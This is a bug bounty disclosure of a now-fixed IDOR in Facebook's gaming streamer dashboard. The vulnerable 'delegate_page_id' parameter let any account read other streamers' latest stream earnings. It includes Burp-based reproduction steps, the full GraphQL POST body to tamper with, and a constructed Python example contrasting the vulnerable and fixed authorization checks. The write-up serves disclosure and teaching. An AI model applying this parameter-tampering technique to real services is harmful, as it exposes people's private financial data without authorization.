Disclose latest stream video asset earnings for any gaming streamer page

Introduction

Within the Facebook gaming dashboard, streamers have access to a valuable feature known as the “Viewing Stream Report.” This option provides essential information about their stream, including details such as the title, description, and tagged game. Streamers can leverage this tool to gain insights into the performance and key attributes of their streams. For additional details, refer to the official guide at https://www.facebook.com/business/help/423354648152123?id=648321075955172.

The finding

The POST request that serves this option is vulnerable to an Insecure Direct Object Reference (IDOR) in the “delegate_page_id” parameter. The server never checks that the requesting user administers the page named in that parameter, so the financial information attached to the most recent live stream of any gaming streamer’s page can be read by an unrelated account.

This flaw grants the attacker the capability to unveil the earnings associated with the latest stream video asset for any gaming streamer page. The severity of this vulnerability lies in the unauthorized disclosure of sensitive financial data, posing a significant risk to the affected gaming streamers’ privacy and financial security.

Reproduction Steps

Attacker’s Perspective:

  1. Navigate to https://business.facebook.com/creatorstudio/home -> Creative tools -> Live dashboard.
  2. In the “Latest stream” box, click “View Stream Report” and intercept the resulting request with Burp Suite.

Upon intercepting the POST request, observe the following details:

POST /api/graphql/ HTTP/1.1
Host: business.facebook.com

av=attacker_page_id&__user=attacker_user_id&__a=1&__dyn=xxx&__csr=&__req=1l&__beoa=0&__pc=PHASED%3Amedia_manager_pkg&dpr=1&__ccg=EXCELLENT&__rev=1003338073&__s=1go6yt%3A1dmt22%3Amrohob&__hsi=6931897176295571644-0&__comet_req=0&fb_dtsg=xxxxxx&jazoest=22015&__jssesw=1&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=GamesVideoStreamerDashboardProfilePlusVideoQuery&variables={"delegate_page_id":"attacker_page_ID"}&server_timestamps=true&doc_id=5005787666128910

The vulnerable parameter is “delegate_page_id.” Change its value to the ID of any other streamer page and forward the request to the server.

This manipulation yields extensive information about the streamer page, including sensitive details:

  • "latest_stream_video_asset_earnings":"500.00"

This information, specifically the earnings, is considered private and should only be accessible to page administrators. Unauthorized access to such financial details poses a serious breach of privacy and requires immediate attention and remediation to uphold the integrity of the platform.
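As an added illustration that is not Facebook’s code, the missing check in defender’s terms: a minimal resolver that reads `__user` and `delegate_page_id` from a form-encoded body shaped like the request above, the vulnerable form that trusts the supplied page ID, and the fixed form that verifies the requesting user actually administers that page. The admin table, page and user IDs, and earnings values are all constructed for the example.

```python
import json
from urllib.parse import parse_qs

# Constructed: which users administer which pages (hypothetical IDs).
PAGE_ADMINS = {
    "page_attacker": {"user_attacker"},
    "page_victim": {"user_victim"},
}

# Constructed: the per-page report data the endpoint would return.
LATEST_STREAM = {
    "page_attacker": {"title": "Ranked night", "latest_stream_video_asset_earnings": "12.00"},
    "page_victim": {"title": "Charity marathon", "latest_stream_video_asset_earnings": "500.00"},
}

# Constructed request body: the attacker's session (__user) asking for the victim's page.
SAMPLE_BODY = (
    "av=page_attacker&__user=user_attacker&fb_api_req_friendly_name="
    "GamesVideoStreamerDashboardProfilePlusVideoQuery"
    '&variables={"delegate_page_id":"page_victim"}&server_timestamps=true'
)

def parse_request(body: str) -> tuple[str, str]:
    """Return (requesting user, requested page) from the form-encoded GraphQL body."""
    fields = parse_qs(body)
    user_id = fields["__user"][0]
    variables = json.loads(fields["variables"][0])
    return user_id, variables["delegate_page_id"]

def is_page_admin(user_id: str, page_id: str) -> bool:
    """Object-level authorization: is this user an administrator of this page?"""
    return user_id in PAGE_ADMINS.get(page_id, set())

def stream_report_vulnerable(body: str) -> dict:
    """IDOR: the page ID is taken from the client and never tied to the session."""
    _, page_id = parse_request(body)
    return LATEST_STREAM[page_id]

def stream_report_fixed(body: str) -> dict:
    """Authorize the session against the requested object before returning anything."""
    user_id, page_id = parse_request(body)
    if not is_page_admin(user_id, page_id):
        raise PermissionError(f"{user_id} does not administer {page_id}")
    return LATEST_STREAM[page_id]
```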

Timeline

Sarmad | 22 Feb 2021

  • Initial Report

Meta Bug Bounty | 24 Feb 2021

  • Report Triaged

Meta Bug Bounty | 16 Mar 2021

  • Report Fixed

Sarmad | 16 Mar 2021

  • Fix Confirmed

Meta Bug Bounty | 19 Mar 2021

  • Bounty Awarded + Bonus
